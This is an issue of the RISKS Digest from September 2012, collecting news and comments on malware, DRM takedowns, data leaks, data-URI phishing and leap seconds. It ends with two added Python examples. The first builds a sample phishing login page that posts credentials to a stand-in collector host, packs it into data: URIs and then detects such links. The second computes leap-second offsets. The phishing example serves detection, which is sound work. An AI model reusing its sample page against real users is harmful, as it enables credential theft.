The Risks Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 27 Issue 02

Thursday 6 September 2012


Hantavirus warning e-mails and letters
Monty Solomon
Lockheed Air-Traffic Upgrade Now on Track, FAA Chief Says
Dave Farber
United Airlines Investigates Network Failure Delaying 580 Flights
Gabe Goldberg
Hack on Saudi Aramco hit 30,000 workstations, oil firm admits
John Leyden via Monty Solomon
Thousands fall victim to utility payment scam
Scott Bauer via Monty Solomon
Can YOU crack the Gauss uber-virus encryption?
John Leyden via Monty Solomon
Harvard Students in Cheating Scandal Say Collaboration Was Accepted
"Automated DRM keeps spoiling the show, from the DNC to Mars"
Phipps-Samson via Gene Wirchenko
Ustream continues to attempt explaining Hugo Awards stream blackout
Lauren Weinstein
Did YouTube Really Block Michelle Obama's DNC Speech for Copyright Infringement?
Lauren Weinstein
1 million iOS device IDs leaked after alleged FBI laptop hack
ars technica via Lauren Weinstein
FBI Says Laptop Wasn't Hacked; never possessed Apple device ID file
WiReD via Lauren Weinstein
"When virtualization becomes your worst enemy"
Gene Wirchenko
When GPS Confuses, You May Be to Blame
Randall Stross via Matthew Kruk
'first ever' Linux, Mac OS X-only password sniffing Trojan spotted
John Leyden via Monty Solomon
Apple patent would disable phone based on location
NBC via Lauren Weinstein
Smartphone apps track users even when shut down
Richard M. Smith
Honeytrap reveals mass monitoring of downloaders
Paul Marks via Dewayne Hendricks
Firefox, Opera allow crooks to hide an entire phish site in a link
John Leyden via Monty Solomon
Test Mercenaries: Quality at Google, 2006-2011
Mike Bland via jidanni
Re: The Cadillac Your Livery Driver Has Been Dreaming Of
Joel Garry
Re: ... civil timekeeping meeting
Steve Allen
Info on RISKS (comp.risks)

Hantavirus warning e-mails and letters

Monty Solomon <>
Fri, 31 Aug 2012 09:02:58 -0400
Excerpt from

2 more Yosemite visitors have hantavirus

Meanwhile, the park sent warning e-mails and letters on Wednesday to another
1,000 people who stayed in tent cabins in Curry Village, after officials
found that a computer glitch had stopped the notices from going out with the
original 1,700 warnings on Monday. The warning says anyone with flu-like
symptoms or respiratory problems should seek immediate medical attention.

Lockheed Air-Traffic Upgrade Now on Track, FAA Chief Says

Dave Farber <>
Fri, 31 Aug 2012 21:02:08 -0400
A $2.4-billion replacement for the U.S. air-traffic control computers
plagued by delays and cost overruns will be completed within the revised
budget and 2014 deadline, said Michael Huerta, acting chief of the FAA.
[ERAM - En-Route Automation Modernization]  [Bloomberg, PGN-ed]

  (well maybe!!! djf)

  [Browse on the Subject line for the article.  Dave's comment might relate
  to the fact that some of our readers may remember the eventual cancelation
  of an earlier en-route ATC modernization effort, after the expenditure of
  $4 billion.  It's nice to know costs are coming down!  PGN]

United Airlines Investigates Network Failure Delaying 580 Flights

Gabe Goldberg <>
Tue, 04 Sep 2012 09:01:59 -0400
Bloomberg, 28 Aug 2012

Hack on Saudi Aramco hit 30,000 workstations, oil firm admits (John Leyden)

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
First hacktivist-style assault to use malware?

John Leyden, *The Register*, 29 August 2012

Saudi Aramco said that it had put its network back online on
Saturday, 10 days after a malware attack floored 30,000 workstations at the
oil giant.  In a statement [1], Saudi Arabia's national oil firm said that
it had "restored all its main internal network services" hit by a malware
outbreak that struck on 15 August. The firm said its core business of oil
production and exploration was not affected by the attack, which resulted in
a decision to suspend Saudi Aramco's website for a period of a few days,
presumably as a precaution. Corporate remote access services were also
suspended as a result of the attack.

Oil and production systems were run off "isolated network systems" unaffected
by the attack, which the firm has pledged to investigate.  In the meantime,
Saudi Aramco promised [2] to improve the security of its network to guard
against fresh assaults. ...

Thousands fall victim to utility payment scam (Scott Bauer)

Monty Solomon <>
Mon, 3 Sep 2012 10:29:50 -0400
Scott Bauer, Thousands fall victim to utility payment scam, Associated
Press, 12 Jul 2012

As much as President Barack Obama wants your vote, he's not actually
offering to pay your monthly bills.  But thousands of Americans have been
persuaded otherwise, falling victim to a fast-moving scam that claims to be
part of an Obama administration program to help pay utility bills in the
midst of a scorching summer.

The scheme spread quickly across the nation in recent weeks with help from
victims who unwittingly shared it on social media sites before realizing
they had been conned out of personal information such as Social Security,
credit card and checking account numbers.  ...

Can YOU crack the Gauss uber-virus encryption?

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
Appeal for help to break open hidden scrambled payload

John Leyden, *The Register*, 14 August 2012

Antivirus experts have called on cryptographers and other clever bods for
help after admitting they are no closer to figuring out the main purpose of
the newly discovered Gauss supervirus.

While it's known that the complex malware features many information-stealing
capabilities, with a specific focus on capturing website passwords, online
banking account credentials and system configuration data from infected
machines, the content of the virus's encrypted payload is still a mystery.

Kaspersky Lab had tracked Gauss for weeks before announcing its discovery
last week. Antivirus experts at the security biz and elsewhere have been
burning the midnight oil in the days since, and although progress has been
made - for example in analysing its architecture [1], unique modules and
communication methods - the payload encryption is unbroken.

Researchers reckon the hidden binary blob, when decrypted and executed,
looks for a program specifically named using an extended character set, such
as Arabic or Hebrew. What that program might be remains unclear as long as
the encryption remains unbroken.

The general consensus among security experts is that Gauss - like Flame, Duqu
and Stuxnet before it - is a nation-state sponsored cyber-espionage toolkit,
quite possibly built from the same components as Flame. ...

  [One of my colleagues suggests that unraveling the hidden payload would
  require breaking some serious crypto, and that someone successfully doing
  so might not be in a position to want to claim success.  But RISKS awaits
  any further news on this topic.  PGN]

Harvard Students in Cheating Scandal Say Collaboration Was Accepted

"Peter G. Neumann" <>
Sun, 2 Sep 2012 17:12:03 PDT
  [An early mention of this case stated: “Harvard University is
  investigating what it calls an `unprecedented' case of cheating.  College
  officials say around 125 students may have shared answers and plagiarized
  on a [Introduction To Congress] final exam.”  Source: Curt Nickisch, NPR
  31 Aug.]  The exam in question was an open-book take-home exam from a
  professor reportedly inclined to give mostly high grades based in part on
  factors such as the number of citations!  Perhaps many of the 125 students
  were citing the same sources from the Internet?  Is that collusion or
  collation collision?  We await details.  PGN]

Richard Perez-Pena, *The New York Times*, 31 Aug 2012

Harvard students suspected in a major cheating scandal said that many of the
accusations are based on innocent - or at least tolerated - collaboration
among students, and with help from graduate-student teachers who sometimes
gave them answers to test questions.

Students said they were tripped up by a course whose tests were confusing,
whose grading was inconsistent, and for which the professor and teaching
assistants gave contradictory signals about what was expected. They face the
possibility of a one-year suspension from Harvard or revocation of their
diplomas if they have already graduated, and some said that they will sue
the university if any serious punishment is meted out.

In years past, the course, Introduction to Congress, had a reputation as one
of the easiest at Harvard College.  Some of the 279 students who took it in
the spring semester said that the teacher, Matthew B. Platt, an assistant
professor of government, told them at the outset that he gave high grades
and that neither attending his lectures nor the discussion sessions with
graduate teaching fellows was mandatory. ...

"Automated DRM keeps spoiling the show, from the DNC to Mars" (Phipps-Samson)

Gene Wirchenko <>
Wed, 05 Sep 2012 14:02:03 -0700
Simon Phipps and Ted Samson, Robots aren't smart enough to decide if video
or song is used lawfully; instead of trying to improve content monitoring
software, we should look to ditch it, *InfoWorld*, 5 Sep 2012

opening text (one of the examples):

Science-fiction fans from all over the world were avidly watching the live
broadcast of the Hugo Awards last Sunday from Chicon 7, the World Science
Fiction Convention in Chicago. This is a venerable event with much more
longevity than you might imagine: Attendees were celebrating the event's
70th year. One of the award winners, British author Neil Gaiman, was
recognized for a script for the cult BBC TV series "Doctor Who." Following
the showing of a clip from the episode, Gaiman took the podium for the award
ceremony to make his acceptance speech.

Then, however, the broadcast was abruptly cut off. A robot at Ustream,
presumably using data provided by the BBC, decided on the basis of that
short clip that this was an illegal broadcast of "Doctor Who" and pulled the
plug. Worse, it turned out that no one at the Hugo Awards or at Ustream was
empowered to turn it back on again.  Ustream has promised to upgrade its
robot to understand fair use, but the proposal is both ridiculous—even
judges struggle with fair use arguments—and dangerous.

Ustream continues to attempt explaining Hugo Awards stream blackout

Lauren Weinstein <>
Tue, 4 Sep 2012 09:41:40 -0700
  "This occurred because our 3rd party automated infringement system,
  Vobile, detected content in the stream that it deemed to be copyrighted.
  Vobile is a system that rights holders upload their content for review on
  many video sites around the web.  The video clips shown prior to Neil's
  speech automatically triggered the 3rd party system at the behest of the
  copyright holder." (Ustream via NNSquad)

Most of the folks commenting on their posting are not very happy.

  [In another NNS posting on this subject, Lauren Weinstein added, “A
  similar risk exists with Google's "Hangouts On Air" via Content ID.
  Solutions are not trivial.”  PGN]

    [Lee Rudolph noted Hugo and the Rampaging Robots.  PGN]

Did YouTube Really Block Michelle Obama's DNC Speech for Copyright Infringement?

Lauren Weinstein <>
Wed, 5 Sep 2012 15:04:11 -0700  (This message on Google+)  (Slate, via NNSquad)

  "Either way, this amounts to something less than a copyright apocalypse.
  Michelle Obama's speech is still available on plenty of other YouTube
  channels, including here, here, and here. But on the heels of the Hugo
  Awards debacle, it's another reminder of the need for human vigilance
  against overzealous digital-rights-management algorithms.  In a statement
  chalking up the glitch to "a technical error on YouTube," an Obama
  campaign official added, "We do not expect tonight's coverage will be
  affected." Copyright bots, the gauntlet has been thrown!"

Irrespective of this particular case, this whole area (not just YouTube) of
automated content flagging needs serious attention from a number of
standpoints.  Here's an example of what has happened to me (and many other
people).  I uploaded a video of mine that included a segment of old,
definitely public domain material.  Shortly thereafter, my entire vid was
flagged by YouTube's Content ID.  Why?  It took some digging to figure out,
but it turns out a Content ID partner had uploaded a video of their own that
happened to include a section of the same public domain material I had used.
This apparently made it look like my video was infringing, since Content ID
assumed the section of my vid that matched their vid was in violation.
Wrong!  But Content ID partners get the assumption of being correct, and
there's no way for an average user to assert that something is public domain
a priori.  I was able to get this reversed by careful explanation on the
appropriate forms, but I wonder how many people would just throw up their
arms and say, "To hell with it!" and not bother?  This is not an easy
situation to solve, but the explicit assumption that Content ID partners are
correct and that takedowns or other actions are immediate—with a protest
required to get blocks, etc. removed after the fact, strikes me as
increasingly problematic.

Lauren Weinstein (
Network Neutrality Squad:  +1 (818) 225-2800

1 million iOS device IDs leaked after alleged FBI laptop hack

Lauren Weinstein <>
Tue, 4 Sep 2012 09:35:18 -0700
  "One million unique device identifiers (UDIDs) from iOS devices have been
  posted online by hacking group AntiSec, who claimed the UDIDs came from an
  FBI-owned laptop. The group published a file containing the UDIDs-as well
  as push notification tokens, device names, and more-on Monday evening,
  promising that there are plenty more entries where that came from. AntiSec
  claims the original file contained roughly 12 million UDID entries-some
  with very personal data attached, such as full names, cell numbers, and
  home addresses."  (ars technica via NNSquad)

[Key word right now is *alleged*.  LW]

FBI Says Laptop Wasn't Hacked; never possessed Apple device ID file

Lauren Weinstein <>
Tue, 4 Sep 2012 16:11:34 -0700
  "The Federal Bureau of Investigation is refuting a statement made by
  members of AntiSec this weekend that they hacked the laptop of an FBI
  special agent and stole a file containing 12 million Apple device IDs and
  associated personal information." (*Wired* via

"When virtualization becomes your worst enemy"

Gene Wirchenko <>
Tue, 04 Sep 2012 10:54:55 -0700
Wrapping everything up in the same box makes hard tasks easy and big
problems bigger, *InfoWorld*, 4 Sep 2012

  [The IT version of putting all of one's eggs in one basket?]

When GPS Confuses, You May Be to Blame (Randall Stross)

"Matthew Kruk" <>
Sun, 2 Sep 2012 01:20:45 -0600
Randall Stross, *The New York Times*, 1 Sep 2012 [PGN-ed]

The turn-by-turn instructions of GPS-based navigation systems, ingeniously
designed though they may be, can't always save us from ourselves.  Consider
the experience of a man from San Diego who flew to the East Coast and picked
up a GPS-equipped rental car at the airport. After 20 minutes, he sensed he
was headed in the wrong direction. Then he realized that he had unthinkingly
entered his California address as his destination.  "The navigation system
had dutifully set a route back to his home in San Diego, 3,000 miles away,"
said Barry Brown, co-director of the Mobile Life Center, based in Stockholm,
which does research on mobile communication. The incident happened to a
friend of his.  Mr. Brown is co-author of a recent paper titled "The Normal
Natural Troubles of Driving With GPS." The paper illuminates a drawback of
GPS technology: that it is designed for docile drivers whose navigational
skills have atrophied. ...

Randall Stross <> is an author based in Silicon Valley and
a professor of business at San Jose State University.

'first ever' Linux, Mac OS X-only password sniffing Trojan spotted (John Leyden)

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
John Leyden, Windows? Who the hell uses that? *The Register*, 29 August 2012

Security researchers have discovered a potentially dangerous Linux and Mac OS
X cross-platform trojan.  Once installed on a compromised machine, Wirenet-1
opens a backdoor to a remote command server, and logs key presses to capture
passwords and sensitive information typed by victims.

The program also grabs passwords submitted to Opera, Firefox, Chrome and
Chromium web browsers, and credentials stored by applications including
e-mail client Thunderbird, web suite SeaMonkey, and chat app Pidgin.  The
malware then attempts to upload the gathered data to a server hosted in the
Netherlands. ...

Apple patent would disable phone based on location

Lauren Weinstein <>
Tue, 4 Sep 2012 21:24:26 -0700
  "Among a bevy of patents awarded to Apple this week was one that would
  enable or disable certain features of a phone depending on its
  location. It could be useful, but it also raises serious questions about
  who really owns your device."  (NBC via NNSquad)

A lot of ideas are patented but never used.  Anyway, without reading the
patent in detail, I'd note there are a variety of apps (that probably
postdate the patent application) that do this already.  One problem with any
attempt to enforce such a regime is that you need everyone to have phones
carrying the capability, and you have to be ready for the litigation
exposure if (for example) an important call or message is blocked by such a
system.  It doesn't take much imagination to think of a bunch of other
exposure examples as well.

Smartphone apps track users even when shut down

"Richard M. Smith" <>
Mon, 3 Sep 2012 08:10:44 -0400

Some smartphone apps collect and transmit sensitive information stored on a
phone, including location, contacts, and Web browsing histories, even when
the apps are not being used by the phone's owner, according to two
researchers at the Massachusetts Institute of Technology.

"It seems like people are no longer in control of their own privacy," said
Frances Zhang, a master's degree student in computer science at MIT.

Zhang and fellow researcher Fuming Shih, a computer science doctoral
candidate, found that some popular apps for phones running Google Inc.'s
Android operating system are continually collecting information without
informing the phone's owner.

The popular game Angry Birds uses the phone's GPS and Wi-Fi wireless
networking features to track the owner's location, even when he's not
playing the game, for example. Another game, Bowman, collects information
from the phone's Internet browser, including what websites the owner has
been visiting. And WhatsApp, a popular text-messaging program, scans the
user's address book when it is seemingly idle.

Honeytrap reveals mass monitoring of downloaders (Paul Marks)

Dewayne Hendricks <>
Wednesday, September 5, 2012
Paul Marks, *New Scientist*, 4 Sep 2012, via Dave Farber's IP

Anyone who has downloaded pirated music, video or ebooks using a BitTorrent
client has probably had their IP address logged by copyright-enforcement
authorities within 3 hours of doing so. So say computer scientists who
placed a fake pirate server online - and very quickly found monitoring
systems checking out who was taking what from the servers.

The news comes from this week's SecureComm conference in Padua, Italy, where
computer security researcher Tom Chothia and his colleagues at the
University of Birmingham, UK, revealed they have discovered "massive
monitoring" of BitTorrent download sites, such as the PirateBay, has been
taking place for at least three years.

BitTorrent is a data distribution protocol that splits an uploaded digital
media file into many parts and shares it around a swarm of co-operating
servers. Birmingham's fake server acted like a part of a file-sharing swarm
and the connections made to it quickly revealed the presence of file-sharing
monitors run by "copyright enforcement organisations, security companies and
even government research labs". ...

Firefox, Opera allow crooks to hide an entire phish site in a link (John Leyden)

Monty Solomon <>
Mon, 3 Sep 2012 19:52:17 -0400
John Leyden, Watch out for the tinyurl that isn't, *The Register*, 3 Sep 2012

A shortcoming in browsers including Firefox and Opera allows crooks to
easily hide an entire malicious web page in a clickable link - ideal for
fooling victims into handing over passwords and other sensitive info.

Usually, so-called "phishing attacks" rely on tricking marks into visiting
websites designed by criminals to masquerade as banks and online stores,
thus snaffling punters' credentials and bank account details when they try
to use the bogus pages. However this requires finding somewhere to host the
counterfeit sites, which are often quickly taken down by hosting companies
and the authorities or blocked by filters.

Instead, the malicious web pages can be stored in data URIs - uniform
resource identifiers, not to be confused with URLs - which stuff the web
code into a handy string that when clicked on, instructs the browser to
unpack the payload and present it as a page.

It negates the need to find somewhere to secrete your malicious page, and
once shortened using a service such as TinyURL, the URI can be reduced to a
small URL perfect for passing around social networks, online chats and
e-mail. Crooks would still need to set up a server to receive data from
victims, however. ...
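As an added example, not taken from the article or from any browser or service it names: the code below shows how a whole page rides inside a `data:` URI in the way the article describes, and a filter-side check that decodes such links, including after a shortener hop, to see whether they carry an inline HTML form that posts credentials somewhere. The sample page, the `short.example` resolver table standing in for a TinyURL-style redirect, and the `collector.example.net` host are all constructed for the demonstration.

```python
import base64
import re
from urllib.parse import quote, unquote

# Constructed sample page standing in for the phish HTML the article
# describes: a login form whose action posts to an attacker-run collector.
# Placeholder host names, not real captured content.
SAMPLE_PAGE = (
    '<html><body><h1>Sign in</h1>'
    '<form action="https://collector.example.net/drop" method="post">'
    'User <input name="u"> Pass <input name="p" type="password">'
    '<input type="submit"></form></body></html>'
)

# data:[<media type>][;param...],<payload>
DATA_URI_RE = re.compile(r"^data:([^;,]*)((?:;[^;,]*)*),(.*)$", re.S)


def make_data_uri(html: str, b64: bool = True) -> str:
    """Pack a whole page into a data: URI; no hosting needed for the page."""
    if b64:
        return "data:text/html;base64," + base64.b64encode(html.encode()).decode()
    return "data:text/html," + quote(html, safe="")


def decode_data_uri(uri: str):
    """Return (media_type, decoded_bytes), or None if this is not a data: URI."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        return None
    media_type = (m.group(1) or "text/plain").lower()
    params = m.group(2).lower()
    payload = unquote(m.group(3))
    if ";base64" in params:
        payload += "=" * (-len(payload) % 4)   # tolerate unpadded payloads
        data = base64.b64decode(payload)
    else:
        data = payload.encode()
    return media_type, data


def inspect_link(link: str, resolver=None) -> dict:
    """Classify one link. `resolver` maps a shortened URL to its target; here a
    constructed dict, in a real filter an HTTP HEAD with redirects disabled."""
    target, hops = link, 0
    while resolver and target in resolver and hops < 5:
        target, hops = resolver[target], hops + 1
    verdict = {"link": link, "target": target, "hops": hops,
               "inline_html": False, "form_actions": [], "password_field": False}
    decoded = decode_data_uri(target)
    if decoded is None:
        return verdict
    media_type, body = decoded
    text = body.decode("utf-8", errors="replace")
    if media_type in ("text/html", "application/xhtml+xml") or "<html" in text.lower():
        verdict["inline_html"] = True
        verdict["form_actions"] = re.findall(
            r'<form[^>]*\baction=["\']?([^"\'\s>]+)', text, re.I)
        verdict["password_field"] = bool(
            re.search(r'<input[^>]*type=["\']?password', text, re.I))
    return verdict


def flag_messages(messages, resolver=None):
    """Run the check over a batch of message bodies; return the flagged links."""
    url_re = re.compile(r"(?:https?://\S+|data:\S+)")
    return [v for msg in messages for v in
            (inspect_link(link, resolver) for link in url_re.findall(msg))
            if v["inline_html"]]


if __name__ == "__main__":
    # Constructed shortener table: the short link resolves to the data: URI.
    resolver = {"https://short.example/abc": make_data_uri(SAMPLE_PAGE)}
    messages = [
        "Your account needs review: https://short.example/abc",
        "Direct: " + make_data_uri(SAMPLE_PAGE, b64=False),
        "Normal link https://www.example.com/login",
    ]
    for hit in flag_messages(messages, resolver):
        print(hit["link"], "-> posts to", hit["form_actions"],
              "password field:", hit["password_field"])
```

The point of the `form_actions` field is the last sentence of the article: the page itself needs no host, but the credentials still have to go somewhere, and that collector address is the one durable indicator a filter or takedown team can act on.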

Test Mercenaries: Quality at Google, 2006-2011 (Mike Bland)

Thu, 06 Sep 2012 07:38:34 +0800
"This crossed my desk this morning, it is a long and detailed (and honest!)
account by an insider of Google's efforts to increase code quality and
product quality: "

  [This item is indeed long, but could be worth reading if you consider
  yourself a software engineer.  PGN]

Re: The Cadillac Your Livery Driver Has Been Dreaming Of (R-27.01)

jgar the jorrible <joel-garry>
Wed, 5 Sep 2012 14:52:06 -0700 (PDT)
An MSN editorial had some insight:

"...Is that my cell phone buzzing, or the seat?

Cadillac has a good idea here. Instead of annoying
the driver with flashing lights and buzzing sounds from various active
safety systems, it sends all those warnings to his back and rear end. ...

The touch-capacitive dash is another story. See those silver trim pieces
that look like you should touch them? Don't. They're just finger guides. The
actual sensors are above them, which is confusing and frustrating. They're
also slow to respond to repeated inputs, like adjusting the cooled seat or
the fan speed, unless you're deliberate with your pace and timing. Who wants
to think about how you touch a control, especially while driving? Lincoln
already came out with this system and it's no different. It's like tapping a
plastic post and wondering if some magic will happen. You also feel kind of
dumb getting it wrong, which tends to happen when you're paying attention to
the road.

This feature needs to die."

Personally, I'm amazed that any UI designer for car controls would even
think of making hand-eye coordination necessary for ancillary controls.  I
can control my old New Beetle radio and HVAC by touch, with very little
learning.  But my other cars with touch screens, any little bump and the
wrong command gets invoked.  And the voice control?  I could go on and on,
but in a nutshell, not there yet, adds frustration.

Re: ... civil timekeeping meeting (RISKS-26.92,93,98,27.01)

Steve Allen <>
Fri, 31 Aug 2012 10:20:22 -0700
> And the people who don't like leap seconds or find them hard to deal
> with can switch to TAI, which already exists.  Need a cheap local
> source of TAI?  Get a GPS.  And start setting up an NTP network of TAI
> timeservers—anyone doing this yet?

People are doing this.  Several manufacturers of NTP servers allow an option
where it can *violate the NTP spec* and provide GPS time or TAI instead of
UTC.  Alternatively, the IEEE 1588 spec for PTP is all about this notion of
an operational system time scale based on TAI.  Alas, many international
agencies responsible for this subject do not have scope of purview to make
pronouncements on this subject, and the proceedings of various meetings do
not show consensus.

During the past decade the pronouncements from the providers of TAI at BIPM
have done an about face.  In 1999 the CCTF wrote saying yes, use TAI instead
of UTC:

  The CCTF recommends, therefore, that in conformity with this ITU
  Recommendation developers of future satellite navigation systems and
  electronic communication systems should link their time scales to TAI as
  the only alternative to UTC and that, insofar as it is feasible, existing
  systems take steps to align their time scales with TAI.

But in 2007 the CCTF wrote quite the opposite, saying no, do not use TAI
instead of UTC:

  TAI is the uniform time scale underlying UTC, and that it should not be
  considered as an alternative time reference.

TAI also does not serve POSIX, which specifies that the time_t is based on a
trivial relationship to the face-value of UTC and that all days must have
86400 seconds.  Unfortunately for POSIX the entire point of the UTC used in
radio broadcast time signals since 1972 is that the second is not related to
the day.

From a system engineering standpoint it makes sense to use TAI, but its
providers do not clearly agree.  Furthermore, it is not possible to use TAI
in an operational system because its value is not available until the next
month.  Using GPS system time is an available good choice from an
engineering standpoint, but GPS does not have international standard status
required by some contractual specifications.

The previous meeting on the future of UTC re-visited many of these subjects.
The final paper at that meeting gave a worked example of using leap-free
uniform atomic time (GPS or TAI) for POSIX while still retaining the notion
of UTC day defined by earth rotation.  Slides and preprints of the 400-page
proceedings are available at

Steve Allen, UCO/Lick Observatory--ISB, 1156 High Street, Santa Cruz, CA
95064 +1 831 459 3046  <>
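A worked illustration, added here and not part of Steve Allen's post: the POSIX, TAI and GPS counts across the leap second of 30 June 2012, showing why a POSIX time_t cannot represent it and what the "cheap local TAI" from a GPS receiver actually hands out. The leap-second entries (TAI-UTC of 33, 34 and 35 s from 2006-01-01, 2009-01-01 and 2012-07-01) and the fixed 19 s TAI-GPS offset are the published IERS and GPS values supplied by me, not stated in the post; the table deliberately covers only 2006 to 2015 and refuses to answer outside that range.

```python
from datetime import datetime, timedelta, timezone

UTC = timezone.utc
POSIX_EPOCH = datetime(1970, 1, 1, tzinfo=UTC)
GPS_EPOCH = datetime(1980, 1, 6, tzinfo=UTC)   # GPS time started at UTC 1980-01-06 00:00:00
TAI_MINUS_GPS = 19                              # fixed for the life of GPS (TAI-UTC was 19 s in 1980)

# Excerpt of the leap-second history: TAI-UTC in whole seconds from each UTC
# instant, as published by IERS Bulletin C. Only the entries needed below are
# included, so queries outside 2006-2015 raise rather than return a wrong offset.
LEAP_TABLE = [
    (datetime(2006, 1, 1, tzinfo=UTC), 33),
    (datetime(2009, 1, 1, tzinfo=UTC), 34),
    (datetime(2012, 7, 1, tzinfo=UTC), 35),
]
TABLE_END = datetime(2015, 7, 1, tzinfo=UTC)    # next leap second; table not maintained past here

# The instants either side of the 2012-06-30 23:59:60 leap second.
LEAP_BEFORE = datetime(2012, 6, 30, 23, 59, 59, tzinfo=UTC)
LEAP_AFTER = datetime(2012, 7, 1, 0, 0, 0, tzinfo=UTC)


def tai_minus_utc(utc: datetime) -> int:
    if utc < LEAP_TABLE[0][0] or utc >= TABLE_END:
        raise ValueError("outside the constructed leap-second table")
    offset = LEAP_TABLE[0][1]
    for start, delta in LEAP_TABLE:
        if utc >= start:
            offset = delta
    return offset


def posix_seconds(utc: datetime) -> int:
    """POSIX time_t: a face-value count in which every UTC day has 86400 s.
    The inserted second 23:59:60 gets no value of its own."""
    return int((utc - POSIX_EPOCH).total_seconds())


def tai_seconds(utc: datetime, in_leap_second: bool = False) -> int:
    """Uniform, leap-free count: the POSIX count plus the leap seconds so far.
    datetime cannot spell 23:59:60, so the leap second is addressed as the
    preceding 23:59:59 with in_leap_second=True."""
    return posix_seconds(utc) + tai_minus_utc(utc) + (1 if in_leap_second else 0)


def gps_minus_utc(utc: datetime) -> int:
    return tai_minus_utc(utc) - TAI_MINUS_GPS


def gps_week_and_sow(utc: datetime, in_leap_second: bool = False):
    """GPS week number and seconds-of-week: the leap-free count since the GPS
    epoch, which is what a receiver hands out."""
    gps_sec = (posix_seconds(utc) - posix_seconds(GPS_EPOCH)
               + gps_minus_utc(utc) + (1 if in_leap_second else 0))
    return divmod(gps_sec, 7 * 86400)


def utc_day_length_tai(day: datetime) -> int:
    """Length of a UTC calendar day in SI seconds (86401 on a leap-second day)."""
    start = day.replace(hour=0, minute=0, second=0, microsecond=0)
    return tai_seconds(start + timedelta(days=1)) - tai_seconds(start)


if __name__ == "__main__":
    print("POSIX delta across the leap second:",
          posix_seconds(LEAP_AFTER) - posix_seconds(LEAP_BEFORE))    # 1: the second vanished
    print("TAI delta across the leap second:  ",
          tai_seconds(LEAP_AFTER) - tai_seconds(LEAP_BEFORE))        # 2: both seconds counted
    print("UTC day 2012-06-30 lasted", utc_day_length_tai(LEAP_BEFORE), "SI seconds")
    print("GPS-UTC afterwards:", gps_minus_utc(LEAP_AFTER), "s; GPS week/sow at UTC midnight:",
          gps_week_and_sow(LEAP_AFTER))
```

Two things fall out that the prose states but a reader rarely sees in numbers: the POSIX count advances by one across an interval that lasted two SI seconds, so the 86400-second day that POSIX mandates was in fact 86401 s long; and the GPS week rolled over at 2012-06-30 23:59:44 UTC, because GPS time by then ran 16 s ahead of UTC, which is exactly the kind of offset an NTP server handing out GPS time in place of UTC would silently carry.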
